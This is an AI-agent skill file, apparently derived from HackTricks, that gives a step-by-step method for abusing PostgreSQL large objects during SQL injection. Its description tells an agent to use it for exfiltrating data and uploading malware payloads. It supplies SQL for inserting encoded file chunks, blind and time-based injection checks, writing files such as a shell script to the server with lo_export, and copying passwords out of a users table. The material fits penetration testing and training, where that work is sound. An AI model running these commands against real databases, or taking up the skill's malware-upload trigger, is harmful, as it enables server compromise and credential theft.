Hacktricks-skills postgresql-large-object-upload

Upload binary files to PostgreSQL using large objects (pg_largeobject). Use this skill whenever you need to store files in PostgreSQL, exfiltrate data via SQL injection, upload malware payloads, or work with pg_largeobject, lo_creat, lo_import, lo_export functions. Trigger for any PostgreSQL file upload task, binary data storage, or when dealing with SQL injection scenarios requiring file operations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql/SKILL.MD
source content

PostgreSQL Large Object Upload

This skill helps you upload binary files to PostgreSQL using the `pg_largeobject` table, which stores data in 2KB chunks. This is essential for SQL injection exploitation, data exfiltration, and file storage in PostgreSQL databases.

When to Use This Skill

  • Uploading files to PostgreSQL via SQL injection
  • Storing binary data (images, PDFs, executables) in PostgreSQL
  • Exfiltrating data through SQL injection vulnerabilities
  • Working with `pg_largeobject`, `lo_creat`, `lo_import`, `lo_export`
  • Creating reverse shells or payloads in PostgreSQL

Core Concepts

Large Object Structure

PostgreSQL large objects store data in the `pg_largeobject` system table with this structure:

  • loid: Large Object ID (unique identifier)
  • pageno: Page number (0-indexed, each page = 2KB)
  • data: Binary data chunk (exactly 2KB except possibly the last chunk)
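The page arithmetic above is easy to sketch; `locate` is a hypothetical helper, and `LOBLKSIZE = 2048` assumes a default PostgreSQL build:

```python
# Map a byte offset inside a large object to its pg_largeobject page.
# LOBLKSIZE is 2048 bytes in a default build (assumption: BLCKSZ/4 with
# the standard 8KB block size).
LOBLKSIZE = 2048

def locate(offset: int) -> tuple[int, int]:
    """Return (pageno, offset_within_page) for a byte offset."""
    return offset // LOBLKSIZE, offset % LOBLKSIZE

print(locate(0))     # byte 0 lives in page 0, offset 0
print(locate(5000))  # byte 5000 lives in page 2, offset 904
```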

Why 2KB Chunks?

`lo_export()` reassembles the object page by page, so every chunk except the last must be exactly 2KB (2048 bytes, the `LOBLKSIZE` page size). A short page in the middle would corrupt the reconstructed file; only the last chunk can be smaller.

Workflow

Step 1: Prepare Your File

Split your binary file into 2KB chunks:

# Use the bundled script
python scripts/chunk_file.py <input_file> <output_dir>

# Or manually
split -b 2048 your_file.txt chunks_
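If the bundled script is unavailable, the chunking step is simple enough to sketch; `chunk_file` below is a hypothetical stand-in, not the actual `scripts/chunk_file.py`:

```python
# Minimal sketch of a 2KB chunker (the bundled script's real interface
# is an assumption here).
import sys
from pathlib import Path

CHUNK_SIZE = 2048  # LOBLKSIZE: one pg_largeobject page

def chunk_file(input_file: str, output_dir: str) -> list[Path]:
    out = Path(output_dir)
    out.mkdir(parents=True, exist_ok=True)
    data = Path(input_file).read_bytes()
    paths = []
    for start in range(0, len(data), CHUNK_SIZE):
        # One file per page, named by page number for ordered insertion
        p = out / f"chunk_{start // CHUNK_SIZE:04d}"
        p.write_bytes(data[start:start + CHUNK_SIZE])
        paths.append(p)
    return paths

if __name__ == "__main__" and len(sys.argv) == 3:
    for p in chunk_file(sys.argv[1], sys.argv[2]):
        print(p)
```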

Step 2: Encode Chunks

Encode each chunk to Base64 or Hex for SQL insertion:

# Base64 (recommended - more compact)
python scripts/encode_chunks.py --format base64 chunks_*

# Hex (useful for certain injection contexts)
python scripts/encode_chunks.py --format hex chunks_*

Encoding size considerations:

  • Base64: `ceil(n / 3) * 4` bytes (e.g., 2KB → ~2.7KB)
  • Hex: `n * 2` bytes (e.g., 2KB → 4KB)
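These size formulas can be checked against Python's own encoders:

```python
# Verify the per-chunk encoding overhead for a full 2048-byte page.
import base64
import math

chunk = b"\x00" * 2048
b64 = base64.b64encode(chunk)
hexed = chunk.hex()

assert len(b64) == math.ceil(2048 / 3) * 4   # 2732 characters (~2.7KB)
assert len(hexed) == 2048 * 2                # 4096 characters (4KB)
print(len(b64), len(hexed))                  # 2732 4096
```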

Step 3: Create Large Object

Choose your method based on your access level:

Method A: `lo_creat` (Standard)

-- Create a new large object (auto-generated LOID)
SELECT lo_creat(-1);

-- Note: Returns the LOID you'll need for subsequent operations

Method B: `lo_create` (Fixed LOID - for Blind SQLi)

-- Create with specific LOID (useful for blind SQL injection)
SELECT lo_create(173454);

Why fixed LOID? In blind SQL injection, you can't see the returned LOID. Using a fixed value lets you reference it in subsequent queries.

Step 4: Insert Data Chunks

Using Base64 (Recommended)

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 0, decode('<base64_chunk_1>', 'base64'));

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 1, decode('<base64_chunk_2>', 'base64'));

-- Continue for all chunks...

Using Hex

INSERT INTO pg_largeobject (loid, pageno, data) 
VALUES (173454, 0, decode('<hex_chunk_1>', 'hex'));

-- Or update existing pages
UPDATE pg_largeobject 
SET data = decode('<hex_chunk_1>', 'hex') 
WHERE loid = 173454 AND pageno = 0;
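Generating these statements can be scripted; the sketch below is what `scripts/generate_sql.py` presumably automates (its real behavior is an assumption). Base64 is convenient here because its alphabet contains no quote characters, so the literal never needs SQL escaping:

```python
# Build one INSERT per 2KB chunk, with consecutive pageno values.
import base64

def inserts_for(loid: int, chunks: list[bytes]) -> list[str]:
    stmts = []
    for pageno, chunk in enumerate(chunks):
        b64 = base64.b64encode(chunk).decode("ascii")
        stmts.append(
            "INSERT INTO pg_largeobject (loid, pageno, data) "
            f"VALUES ({loid}, {pageno}, decode('{b64}', 'base64'));"
        )
    return stmts

for stmt in inserts_for(173454, [b"\x7fELF", b"rest-of-file"]):
    print(stmt)
```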

Step 5: Export to Filesystem

-- Export the large object to a file
SELECT lo_export(173454, '/tmp/your_file');

-- Clean up (optional but recommended)
SELECT lo_unlink(173454);

Alternative: `lo_import` Method

If you have filesystem access on the database server:

-- Import file directly (creates LOID automatically)
SELECT lo_import('/path/to/file');

-- Import with specific LOID
SELECT lo_import('/path/to/file', 173454);

Note: `lo_import` reads the file on the database server, so the server process (not the client) must have read access to the path.

SQL Injection Scenarios

Blind SQL Injection

When you can't see query results:

  1. Use fixed LOID (e.g., 173454)
  2. Insert chunks one at a time
  3. Use time-based or boolean-based checks to verify success
  4. Export when all chunks are inserted

Example time-based check:

-- If this succeeds, wait 5 seconds
SELECT CASE WHEN (SELECT count(*) FROM pg_largeobject WHERE loid=173454) > 0 
THEN pg_sleep(5) ELSE NULL END;
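Building that check per LOID is easy to script; `time_check` is a hypothetical helper, and the 5-second delay is an assumption to tune against the target's baseline latency:

```python
# Generate the time-based verification query for a given LOID.
def time_check(loid: int, delay: int = 5) -> str:
    return (
        "SELECT CASE WHEN "
        f"(SELECT count(*) FROM pg_largeobject WHERE loid={loid}) > 0 "
        f"THEN pg_sleep({delay}) ELSE NULL END;"
    )

print(time_check(173454))
```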

Error-Based SQL Injection

Use errors to confirm operations:

-- Trigger error if LOID doesn't exist
SELECT lo_export(173454, '/tmp/test');

Debugging

View Large Object Contents

-- See all chunks (escape encoding for readability)
SELECT loid, pageno, encode(data, 'escape') 
FROM pg_largeobject 
WHERE loid = 173454 
ORDER BY pageno;

-- Count chunks
SELECT loid, count(*) as chunk_count 
FROM pg_largeobject 
WHERE loid = 173454;

-- Check total size
SELECT loid, count(*) * 2048 as approx_size_bytes 
FROM pg_largeobject 
WHERE loid = 173454;

List All Large Objects

SELECT DISTINCT loid FROM pg_largeobject;

-- Or, with ownership metadata
SELECT oid, lomowner FROM pg_largeobject_metadata;

Limitations & Considerations

Access Control Lists (ACLs)

Large objects may have ACLs restricting access:

  • You may not be able to access objects you didn't create
  • Older objects might have permissive ACLs (useful for exfiltration)
  • Check permissions: `SELECT * FROM pg_largeobject_metadata WHERE oid = <oid>`

Required Privileges

  • `lo_creat` / `lo_create`: callable by any role that can connect to the database
  • `lo_export` / `lo_import` (server-side file access): superuser-only before PostgreSQL 11; from 11 on, controlled by `EXECUTE` privilege on the function, which is revoked from `PUBLIC` by default
  • `lo_unlink`: requires ownership of the large object (or superuser)

Size Limits

  • A PostgreSQL large object can store up to 4TB (2GB before PostgreSQL 9.3)
  • Each chunk must be exactly 2KB (except the last)
  • Total chunks = `ceil(file_size / 2048)`
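The chunk arithmetic is worth precomputing before an upload:

```python
# How many INSERTs a file needs, and how big the final (short) page is.
import math

def chunk_layout(file_size: int, chunk_size: int = 2048) -> tuple[int, int]:
    """Return (total_chunks, last_chunk_size) for a file."""
    total = math.ceil(file_size / chunk_size)
    last = file_size - (total - 1) * chunk_size if file_size else 0
    return total, last

print(chunk_layout(5000))  # (3, 904): two full pages plus a 904-byte tail
```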

Quick Reference

| Operation | SQL Command | Notes |
| --- | --- | --- |
| Create LO | `SELECT lo_creat(-1)` | Auto-generates LOID |
| Create LO (fixed) | `SELECT lo_create(173454)` | Use for blind SQLi |
| Insert chunk | `INSERT INTO pg_largeobject...` | 2KB chunks |
| Export | `SELECT lo_export(loid, '/path')` | Writes to filesystem |
| Delete | `SELECT lo_unlink(loid)` | Clean up |
| View chunks | `SELECT * FROM pg_largeobject` | Debug |

Scripts

Use the bundled scripts to automate the workflow:

  • `scripts/chunk_file.py` - Split files into 2KB chunks
  • `scripts/encode_chunks.py` - Encode chunks to Base64 or Hex
  • `scripts/generate_sql.py` - Generate SQL INSERT statements

Run `python scripts/<script>.py --help` for usage details.

Examples

Upload a Shell Script

# 1. Chunk the file
python scripts/chunk_file.py /tmp/shell.sh /tmp/chunks/

# 2. Encode to Base64
python scripts/encode_chunks.py --format base64 /tmp/chunks/*

# 3. Generate SQL
python scripts/generate_sql.py --loid 173454 --format base64 /tmp/chunks/*

# 4. Execute SQL in your injection point
# 5. Export: SELECT lo_export(173454, '/tmp/shell.sh');

Exfiltrate Database Contents

-- 1. Create large object
SELECT lo_create(173455);

-- 2. Insert data from a sensitive table (convert_to() turns text into bytea,
--    which the data column requires)
INSERT INTO pg_largeobject (loid, pageno, data)
SELECT 173455, 0, convert_to(password, 'UTF8') FROM users LIMIT 1;

-- 3. Export
SELECT lo_export(173455, '/tmp/extracted.txt');

Troubleshooting

"Large object does not exist": The LOID doesn't exist or was already deleted. Create a new one.

"Permission denied": Check your privileges on

lo_export
and the target directory.

"Chunk size mismatch": Ensure all chunks except the last are exactly 2KB.

File corrupted after export: Verify chunk sizes and that all chunks were inserted in order.
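A quick pre-flight check catches the chunk-size and ordering problems above before any SQL is sent; `validate_chunks` is an illustrative helper:

```python
# Every chunk except the last must be exactly 2048 bytes, or lo_export()
# will reconstruct a corrupted file.
CHUNK_SIZE = 2048

def validate_chunks(chunks: list[bytes]) -> None:
    """Raise ValueError if the chunk list cannot reconstruct cleanly."""
    for pageno, chunk in enumerate(chunks):
        if len(chunk) > CHUNK_SIZE:
            raise ValueError(f"page {pageno} exceeds {CHUNK_SIZE} bytes")
        is_last = pageno == len(chunks) - 1
        if not is_last and len(chunk) != CHUNK_SIZE:
            raise ValueError(
                f"page {pageno} is {len(chunk)} bytes, expected {CHUNK_SIZE}"
            )

validate_chunks([b"\x00" * 2048, b"\x00" * 904])  # OK: full page + tail
```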